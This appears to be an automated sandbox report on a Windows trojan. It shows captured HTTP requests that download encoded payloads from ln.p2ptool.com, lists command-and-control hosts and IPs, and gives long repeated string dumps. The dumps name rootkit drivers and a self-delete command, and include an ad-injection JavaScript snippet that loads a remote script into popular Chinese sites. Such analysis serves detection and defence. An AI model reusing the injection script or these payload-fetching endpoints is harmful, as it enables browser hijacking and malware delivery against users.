Content-Length: 732892
Last-Modified: Tue, 02 Jun 2015 09:08:07 GMT
Connection: close
ETag: "556d7277-b2edc"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCs7GeQSgT0LMSbeMnDrAUu1dbIATI0j4Fpg2lzu0SyFXzewwBYw9RMWaq6NhW/qg8rEKg/FLPEQc4O/r6B tUg au31FBt5lt6BIPeEcR3JJeXgyq3ERRVAtyQEhfZ0huL70G maW8Endo8iciIVsnYeiZuZCZoCFCUfpqGdFWishA/RXin0XXN4oaBk5hQl ENYGDXKTReMLdfZyT5q IBVZIi51RfhrztHLTG0EEf1OfLN52HToyuXz6IPoP8wDQi7tJMl31DlbpHsiv1c7IhlgqSaCVUmNsyYiDQUgxqGmbx2VndzWKuzgUzL0/tfbRE6l9I9 Zda06Hfr0VZGjSEOrYe65uttTZs NQKnlXBIaWKZ5oLaPOZkn4b4bFzT9BZqEHXkdbKraEkVIa2RpWitpTjGkjvfPlaHPLxHwYyO9yn57CcpN35xfW7smFkDGzBhRwfNLV8nUSDSO9nKOX7fTg4L5oFJGauP1vWaua4PwssRErj2jHG//V1rBG1CyX3fdIWIte7xQs3MggpiSeXuME2PyHnSRkK/M2mNXZaUcnpBOqZ5Bj8Y5pxJ rhCwgXs8X2VvqX9iu4C86SsB40oelBk5U6QSww6qR 8pHDhhHnZ4IsuyAOhAdmv6Tj4NmdB4nbOhonncjeFenG7eoFIcxR5ZBXAfZ80n/t3CRbL2EdM9lb3yV0POXL7kPN84YR52eCLLspMXZvEmihTEVpuPTG4fuld53I3hXpxu3jcc6Gzy9iEFlbaXxp2TB3izqYm6KhYBcGT9xymKFVrlMDlYOr1i0qh4VE3r2UUeuedUOSPYaWBbSvEQ4te5UPX37/SoSyAA23dw h04bzeEcFAzlE9ymBgrqAvJD4Sr9/MuMIuI9uCYhmDcBUNRmWmbgAcFxq4VydFphMXBg1RWfN7DAFjD1Ey3zHqQ/cCFFh1iz33tJH/hMDvi6dFJzZOcqvrD6V2A5sQ941Ft90whRBkHbD3fR SFW61mRTU2JeO1MlicxWBsQ0fr/5zh3ThZgVvPcKlAIuG fkCFUeMT Ifg hhd/CkUEgBDb52r8rnUjVNkSXG3LPhSJ6zr8PAIfQJjH7j2vXzSDkF46by8zQy3jM5x/bTeCzjyWOoPRnEk11Ga6A9f40oelBk5U6Qrtl39E8J/UsHN1wzYbyYMnDq3xxHoh1929KYyvOW6N12rNbHv0jq4DlCd0MODNYd7A7Ykr4OqSh//UN6uSJWLKUgN3GlDCNjB3eO3qBI65/j9 7xZLVz1IfyWF32d8joSLzGepV/9o8Hd47eoEjrnnjjuUMaeX5OVtQXh m6qqDmZJ G Gxc0xK16gJYZ6sxhIK10kLmAt9FSj0QMavbyRzb aW3zqTxHm2JcvXa4YxrTH1SM4iq 3R3kZ4XlDDSYvcA76EFpcxgFTqcJzdqzPrftd2tbKiQNwMcl8XdWcdllJ6BRNYnUFwVon5K4UX7ZLePK r5A2XvMZTKXPN/
<<< skipped >>>
GET /txt/miniIE_150427.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:29 GMT
Content-Type: text/plain
Content-Length: 1594720
Last-Modified: Mon, 27 Apr 2015 08:27:28 GMT
Connection: close
ETag: "553df2f0-185560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIwdeoQ/p3LZzBo/F8sBT14gU gqvqaR HsRQ0eMlj6jyfjxN Sljm4uxTQeIsstKIgXEZuNNwlSFWZ/Ocl6ajVqrL9FP48YRqiB3vEjm3LlLBj8CmI5HI0dvaAgvZkgrkgBNIKspJzspbEiSObNPaK3flTHHFmlFfE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuxjdyElk00EWwpPpmkWxL592DT6wOksX0Rk/JftCpZs7/GFJwYdLxNbjVKk 3PqZ6J LJTSAQIz5cnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbeDk35AUHl73tufks1XoWabrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5ayjiTpfmIKRl2EZHKlVEuV3E2s0NmUj5a8TazQ2ZSPlr8q6ATLe0BDo1vFqnvbGZ3MTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvTu7cpOA81gl3prqnwQ6ppxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvo8xQR0ILcHUY4PBMHSsLbMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9QYrGSLdEvLVSBJ/sSRlK6PE2s0NmUj5a qSnCa1jASD9aoTtByytZaZMFVEBXlS//3riYRXWEIuxNrNDZlI WtwtiPSWquUIrkSjdIyYLDPA9nNBCdKOkm/hbVWe7aCN8TazQ2ZSPlr8/NtRTCxZ I/Rp3LuKWWWBOVAnZ1Gp5T936SD5tpBgXE2s0NmUj5a qSnCa1jASD 8BgGQTR5rXlvLiHdduaD uVnYBpGHdzxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a n PLUdYAM7u6dY8N0fVQjTBg4AZJAmXzAWuIVAOwWVRWgwWG/PzhWCZHG4tjpXwY8EePoyNjE9bQuOOiksOFys92Mb990zgH 9dcpHTN4oJH82bDLsUnnb8xYIKL6268 iq1CD6QKcyoahwQZemE7qDQdPE4 6Ew1OPiQ9gr3A
<<< skipped >>>
GET /txt/listtl_20150529180255.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=6423EAD7B80B4C2B14DA89161EFECBB4 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:22 GMT
Content-Type: text/plain
Content-Length: 16040
Last-Modified: Fri, 29 May 2015 10:02:55 GMT
Connection: close
ETag: "5568394f-3ea8"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROxLiD7jYDiIqOfONHrgwkqauSWPBROUZW0sipuKUBUb5O4eEZ620XI8CzDjkRi4A8lbnGofzhvn5FyHOlJXHHC/5/ 1gVd/aPlu5jX HBtGpMRW9nZWGzkCKJh2YZVqXz4 9 CYHDHG/UShsQooZeedOexf1uaXRWSRuk94Nh7MJJ3ORJZysb3/XoPYupkLGUuEAIpWQMxyuYFLoiO7uVwuccitdBepzJqgporquQ6McIjGHW1sOfYuU6OCVAsZ3c2jOMUbY1SKSi6ToCA i3Olf377ExOa8q1 3juSINdeL7/FVMiCb1uqWIzZvQiJSCKtMrgUx z0bc90X/Xjlb tkwO481xfsHfJ3/lYpiJmdW4xc/xQAyfc9WLgqTwr6eIKTyHnpP8iIFhUfkIrKH1J/3EytQHmwKhpm9m6p5lZKjiPdAmxGixheGvzjS1ej77jCgUlfvsBOSiONjuWIQRihHqjoN7wtrKcskgLA1GCq/AveFeIyIhwfPjzcLykiSOJrsFKxyzkFjmmT0w4Djlu40OtBFmDnjjdBF HTlwEldRcwvrJT0yZzMo3iU52aq6308i4QcC1Koq52xYc2YEvtxZDhkr5JeWveJbMGsOQAy BIq2m0V7XnD1NjlavQVlnmhJqwWEO84/CqSArg50vz8HXikJo8KnWPGsfNcm7/uZ3NmDG9mPlwAfscV9NghGNOP7PLfG24obuv80QFfGbeYryL/Ga iezCj0VeSj7wbhESI3bewHvj 0x2h0Z0V8CqMUQdstv9PQBpQ9lPEFetlJRrJJfXvEDLlD9SB/Kgyxh5pTH1P1vGNSFmyfDV6A8RmcG2/k0A8hwBJ2QVbWrqjMKyN3C97emrUMCzPw9JdDnV5XD4eSrvgpfJLvxR2dHztn2mmoTWiK35X7NIKbas1bpEQ/SpIzgkthD2x5V6s8y/5xtv5iH3J98HXJCqw8X/avtfIKGFyx51WD/iIlZ0H4sO5A8PjlFz2PHH/TsdPj/PHVneMJ1MQ7BoGkh2dI7qx4Vn lCd4K1NQiZ0oe9b5BvLTkli8hNmqqr8sVnLZhVQoTrHFi IPpiLgs790l9Yfsg4yMZ3zP0Sfa5B5LUEExQ9f3sAX1KvSEm8r4ilG3h7YaMytANKMnY0ndHH9dwAosJEiB/huIyUbh27Jyq8ukGRoWHKHsxLksp18gDJQnPZzOOVN H17ZvFemmXQdTaoJcszYvt25bIf41SEYJ8fnJF6DMkL4g mIuCzv1yA3Bz3KulRQgCeh7MXv6bBYVH5CKyh9Q72kqKuxf3T5VHyiH/1ZNglf/7OC2IiKRUWya2o97rqjztsZxAGYUe8N9EPTBTugSmsMy6ZtejBrAGMfB95efKS0T1h1swoso/ociqzCHLvHvxtIgurr JFJgdBAcwD1fbSFfl8mA8z3EL8LVHmcwIoI2naImhUM2PxjmnEn6uEGYgxWhoevT0HuYom4A3mYKvqUdFhwTve3bdLrnpo80y
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_996:
cS\%Xc
cS\%Xc
f9z.vk
f9z.vk
CCmdTarget
CCmdTarget
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
COMCTL32.DLL
COMCTL32.DLL
ole32.dll
ole32.dll
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
omdlg32.dll
omdlg32.dll
SHELL32.dll
SHELL32.dll
OLEPRO32.DLL
OLEPRO32.DLL
WINMM.dll
WINMM.dll
svchost.exe
svchost.exe
.rsrc
.rsrc
P%dTh[
P%dTh[
En.yGW
En.yGW
.Kh)"
.Kh)"
D.UnQ
D.UnQ
!.IB?S
!.IB?S
%Sioj
%Sioj
.aMOY
.aMOY
5E.axf
5E.axf
.IMpg
.IMpg
3m.be
3m.be
~]%%dH
~]%%dH
$.na\
$.na\
ðuz
ðuz
%xvfR
%xvfR
14.NeDY
14.NeDY
i.MIE
i.MIE
38.TF
38.TF
`L?.tt?c
`L?.tt?c
|&.MG:
|&.MG:
w.JtO
w.JtO
a.iNh5
a.iNh5
: ).BE
: ).BE
-..zFI
-..zFI
.JKGek
.JKGek
7.aVc
7.aVc
C .nG
C .nG
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
MSWSOCK.dll
MSWSOCK.dll
PSAPI.DLL
PSAPI.DLL
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
VERSION.dll
VERSION.dll
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
RegCloseKey
RegCloseKey
ShellExecuteW
ShellExecuteW
.text
.text
`.rdata
`.rdata
@.data
@.data
t.Fj)V
t.Fj)V
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
\\.\SSDTProcess
\\.\SSDTProcess
HideSys.sys
HideSys.sys
\\.\FixTool
\\.\FixTool
Restore.sys
Restore.sys
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
iphlpapi.dll
iphlpapi.dll
UrlUnescapeA
UrlUnescapeA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetCPInfo
GetCPInfo
WINDOWS\
WINDOWS\
F5A937EE-621D-4F66-8020-AB9D5FA1C357
F5A937EE-621D-4F66-8020-AB9D5FA1C357
first.exe
first.exe
bytes=%d-%d
bytes=%d-%d
bytes=%d-
bytes=%d-
HTTP/
HTTP/
HTTP/
HTTP/
XXXXXX
XXXXXX
%s\Connection
%s\Connection
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
ddddddd
ddddddd
flist.bin
flist.bin
cmd.exe /c del
cmd.exe /c del
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
hXXp://
hXXp://
ATL:X
ATL:X
msvcrt
msvcrt
ShellExecuteExA
ShellExecuteExA
ShellExecuteExW
ShellExecuteExW
OpenWindowStationA
OpenWindowStationA
OpenWindowStationW
OpenWindowStationW
SetProcessWindowStation
SetProcessWindowStation
GetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
CloseWindowStation
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyA
RegDeleteKeyW
RegDeleteKeyW
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestA
HttpEndRequestW
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
UrlUnescapeW
UrlUnescapeW
TenSafe_1.exe
TenSafe_1.exe
TenSafe.exe
TenSafe.exe
CreateService Fail %x
CreateService Fail %x
OpenSCManager Fail %x
OpenSCManager Fail %x
KStartServices end x
KStartServices end x
QueryServiceStatus Fail %x
QueryServiceStatus Fail %x
QueryServiceStatus x
QueryServiceStatus x
StartService~ x
StartService~ x
115.238.251.56
115.238.251.56
log.soomeng.com
log.soomeng.com
VVV.4278.cn
VVV.4278.cn
log.zzinfor.cn
log.zzinfor.cn
127.0.0.1
127.0.0.1
zcÃ
zcÃ
h.rdata
h.rdata
H.data
H.data
.reloc
.reloc
E:\CODE_P~1\p2p\HideSys\objfre\i386\HideSys.pdb
E:\CODE_P~1\p2p\HideSys\objfre\i386\HideSys.pdb
ntoskrnl.exe
ntoskrnl.exe
hxdnetmon.sys
hxdnetmon.sys
E:\New\MINIEP~4\sys\Driver\objfre\i386\FixTool.pdb
E:\New\MINIEP~4\sys\Driver\objfre\i386\FixTool.pdb
HAL.dll
HAL.dll
hXXp://VVV.92zy.com/asb/apro.jpg
hXXp://VVV.92zy.com/asb/apro.jpg
92tezheng.ma
92tezheng.ma
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
{00000117-0000-0000-C000-000000000046}
{00000117-0000-0000-C000-000000000046}
ntdll.dll
ntdll.dll
gdi32.dll
gdi32.dll
adpro.cn
adpro.cn
163.com
163.com
126.com
126.com
baidu.com
baidu.com
123.sogou.com
123.sogou.com
hXXps://
hXXps://
VVV.sohu.com
VVV.sohu.com
VVV.sina.com
VVV.sina.com
hao123.com
hao123.com
tmall.com
tmall.com
if (!document.body) return setTimeout(arguments.callee, 100);
if (!document.body) return setTimeout(arguments.callee, 100);
var adpro= document.createElement('script');
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "9959fcb4681e1d19d755";';
adpro.text = '_adpro_pub= "9959fcb4681e1d19d755";';
adpro.text = '_adpro_slot= "0bbbc79f00c47aa6e562";';
adpro.text = '_adpro_slot= "0bbbc79f00c47aa6e562";';
document.body.insertBefore(adpro, document.body.children.item(0));
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
Test
Test
D@ole32.dll
D@ole32.dll
atl.dll
atl.dll
kernel32.dll
kernel32.dll
Kernel32.dll
Kernel32.dll
program internal error number is %d.
program internal error number is %d.
:"%s"
:"%s"
:"%s".
:"%s".
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCException@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
c:\%original file name%.exe
c:\%original file name%.exe
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
CreateDialogIndirectParamA
CreateDialogIndirectParamA
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
pr.Gxz
pr.Gxz
1.WfM^R
1.WfM^R
ATL.DLL
ATL.DLL
COMCTL32.dll
COMCTL32.dll
GDI32.dll
GDI32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
WINSPOOL.DRV
WINSPOOL.DRV
2015.1.20.1
2015.1.20.1
2.0.0.1
2.0.0.1
1, 5, 1, 1516
1, 5, 1, 1516
1, 0, 0, 444
1, 0, 0, 444
\Driver\Tcpip
\Driver\Tcpip
%original file name%.exe_996_rwx_00401000_000C7000:
f9z.vk
f9z.vk
CCmdTarget
CCmdTarget
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
COMCTL32.DLL
COMCTL32.DLL
ole32.dll
ole32.dll
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
omdlg32.dll
omdlg32.dll
SHELL32.dll
SHELL32.dll
OLEPRO32.DLL
OLEPRO32.DLL
WINMM.dll
WINMM.dll
svchost.exe
svchost.exe
.rsrc
.rsrc
P%dTh[
P%dTh[
En.yGW
En.yGW
.Kh)"
.Kh)"
D.UnQ
D.UnQ
!.IB?S
!.IB?S
%Sioj
%Sioj
.aMOY
.aMOY
5E.axf
5E.axf
.IMpg
.IMpg
3m.be
3m.be
~]%%dH
~]%%dH
$.na\
$.na\
ðuz
ðuz
%xvfR
%xvfR
14.NeDY
14.NeDY
i.MIE
i.MIE
38.TF
38.TF
`L?.tt?c
`L?.tt?c
|&.MG:
|&.MG:
w.JtO
w.JtO
a.iNh5
a.iNh5
: ).BE
: ).BE
-..zFI
-..zFI
.JKGek
.JKGek
7.aVc
7.aVc
C .nG
C .nG
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
MSWSOCK.dll
MSWSOCK.dll
PSAPI.DLL
PSAPI.DLL
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
VERSION.dll
VERSION.dll
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
RegCloseKey
RegCloseKey
ShellExecuteW
ShellExecuteW
.text
.text
`.rdata
`.rdata
@.data
@.data
t.Fj)V
t.Fj)V
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
\\.\SSDTProcess
\\.\SSDTProcess
HideSys.sys
HideSys.sys
\\.\FixTool
\\.\FixTool
Restore.sys
Restore.sys
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
iphlpapi.dll
iphlpapi.dll
UrlUnescapeA
UrlUnescapeA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetCPInfo
GetCPInfo
WINDOWS\
WINDOWS\
F5A937EE-621D-4F66-8020-AB9D5FA1C357
F5A937EE-621D-4F66-8020-AB9D5FA1C357
first.exe
first.exe
bytes=%d-%d
bytes=%d-%d
bytes=%d-
bytes=%d-
HTTP/
HTTP/
HTTP/
HTTP/
XXXXXX
XXXXXX
%s\Connection
%s\Connection
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
ddddddd
ddddddd
flist.bin
flist.bin
cmd.exe /c del
cmd.exe /c del
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
hXXp://
hXXp://
ATL:X
ATL:X
msvcrt
msvcrt
ShellExecuteExA
ShellExecuteExA
ShellExecuteExW
ShellExecuteExW
OpenWindowStationA
OpenWindowStationA
OpenWindowStationW
OpenWindowStationW
SetProcessWindowStation
SetProcessWindowStation
GetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
CloseWindowStation
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyA
RegDeleteKeyW
RegDeleteKeyW
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestA
HttpEndRequestW
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
UrlUnescapeW
UrlUnescapeW
TenSafe_1.exe
TenSafe_1.exe
TenSafe.exe
TenSafe.exe
CreateService Fail %x
CreateService Fail %x
OpenSCManager Fail %x
OpenSCManager Fail %x
KStartServices end x
KStartServices end x
QueryServiceStatus Fail %x
QueryServiceStatus Fail %x
QueryServiceStatus x
QueryServiceStatus x
StartService~ x
StartService~ x
115.238.251.56
115.238.251.56
log.soomeng.com
log.soomeng.com
VVV.4278.cn
VVV.4278.cn
log.zzinfor.cn
log.zzinfor.cn
127.0.0.1
127.0.0.1
zcÃ
zcÃ
h.rdata
h.rdata
H.data
H.data
.reloc
.reloc
E:\CODE_P~1\p2p\HideSys\objfre\i386\HideSys.pdb
E:\CODE_P~1\p2p\HideSys\objfre\i386\HideSys.pdb
ntoskrnl.exe
ntoskrnl.exe
hxdnetmon.sys
hxdnetmon.sys
E:\New\MINIEP~4\sys\Driver\objfre\i386\FixTool.pdb
E:\New\MINIEP~4\sys\Driver\objfre\i386\FixTool.pdb
HAL.dll
HAL.dll
hXXp://VVV.92zy.com/asb/apro.jpg
hXXp://VVV.92zy.com/asb/apro.jpg
92tezheng.ma
92tezheng.ma
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
{00000117-0000-0000-C000-000000000046}
{00000117-0000-0000-C000-000000000046}
ntdll.dll
ntdll.dll
gdi32.dll
gdi32.dll
adpro.cn
adpro.cn
163.com
163.com
126.com
126.com
baidu.com
baidu.com
123.sogou.com
123.sogou.com
hXXps://
hXXps://
VVV.sohu.com
VVV.sohu.com
VVV.sina.com
VVV.sina.com
hao123.com
hao123.com
tmall.com
tmall.com
if (!document.body) return setTimeout(arguments.callee, 100);
if (!document.body) return setTimeout(arguments.callee, 100);
var adpro= document.createElement('script');
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "9959fcb4681e1d19d755";';
adpro.text = '_adpro_pub= "9959fcb4681e1d19d755";';
adpro.text = '_adpro_slot= "0bbbc79f00c47aa6e562";';
adpro.text = '_adpro_slot= "0bbbc79f00c47aa6e562";';
document.body.insertBefore(adpro, document.body.children.item(0));
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
Test
Test
D@ole32.dll
D@ole32.dll
atl.dll
atl.dll
kernel32.dll
kernel32.dll
Kernel32.dll
Kernel32.dll
program internal error number is %d.
program internal error number is %d.
:"%s"
:"%s"
:"%s".
:"%s".
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCException@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
c:\%original file name%.exe
c:\%original file name%.exe
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
CreateDialogIndirectParamA
CreateDialogIndirectParamA
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
pr.Gxz
pr.Gxz
1.WfM^R
1.WfM^R
2015.1.20.1
2015.1.20.1
2.0.0.1
2.0.0.1
1, 5, 1, 1516
1, 5, 1, 1516
1, 0, 0, 444
1, 0, 0, 444
\Driver\Tcpip
\Driver\Tcpip
svchost.exe_3088:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
0123456789-
0123456789-
%b %d %H : %M : %S %Y
%b %d %H : %M : %S %Y
%m / %d / %y
%m / %d / %y
%I : %M : %S %p
%I : %M : %S %p
%d / %m / %y
%d / %m / %y
cmd.exe
cmd.exe
GetProcessWindowStation
GetProcessWindowStation
operator
operator
MaxPolicyElementKey
MaxPolicyElementKey
pExecutionResource
pExecutionResource
e:\work\hera\src\common\norm\include\norm\third_party\jsonxx.h
e:\work\hera\src\common\norm\include\norm\third_party\jsonxx.h
[JSONXX] expression '%s' failed at %s:%d ->
[JSONXX] expression '%s' failed at %s:%d ->
HTTP/1.0 200 OK
HTTP/1.0 200 OK
Server: HTTPServ/1.0
Server: HTTPServ/1.0
Content-Type: %s
Content-Type: %s
Content-Length: %d
Content-Length: %d
HTTP/1.0 404 NOT FOUND
HTTP/1.0 404 NOT FOUND